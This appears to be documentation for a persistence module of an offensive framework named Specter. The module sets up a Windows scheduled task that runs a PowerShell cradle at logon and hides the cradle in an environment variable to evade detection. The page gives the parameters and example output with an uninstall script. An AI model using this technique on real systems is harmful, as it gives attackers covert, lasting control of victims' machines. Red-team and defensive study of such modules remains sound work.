Description
Installs persistence by creating a scheduled task to run a PowerShell cradle on user logon.
Overview
Installs persistence by creating a scheduled task to run a PowerShell cradle on logon. The cradle is stored in a user environment variable to mitigate detection. The scheduled task is configured to execute the contents of the specified environment variable as the current user.
Arguments
| Parameter | Type | Description |
|---|---|---|
| TaskName | string | The name of the scheduled task. |
| EnvironmentVariableName | string | The name of an environment variable that will store the PowerShell cradle. |
| Trigger | string | The event that will activate the PowerShell cradle. |
| Build | string | The Specter build identifier. |
Dependencies
- None
Operating Systems
- Windows
Example Output
{
"Persistence": {
"Id": "2ba6265671ee44ba81f1ec40304bb17c",
"Method": "Scheduled Task",
"Trigger": "OnLogon",
"Build": "92cbf1b0f92642859f28f258226cc1f3",
"Profile": "User",
"Event": "Create",
"Success": true,
"UninstallScript": "$output = (schtasks /DELETE /TN 'CacheTask' /F) -join ([System.Environment]::NewLine);\r\n$success = $output -like '*success*';\r\ntry {\r\n\t[Environment]::SetEnvironmentVariable('GPO_AUX', $null, 'Machine');\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"2ba6265671ee44ba81f1ec40304bb17c\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = $success;\r\n\t Method = \"Scheduled Task\";\r\n\t Profile = \"User\";\r\n\t Trigger = \"OnLogon\";\r\n\t}\r\n}",
"TaskName": "CacheTask",
"EnvironmentVariableName": "GPO_AUX"
}
}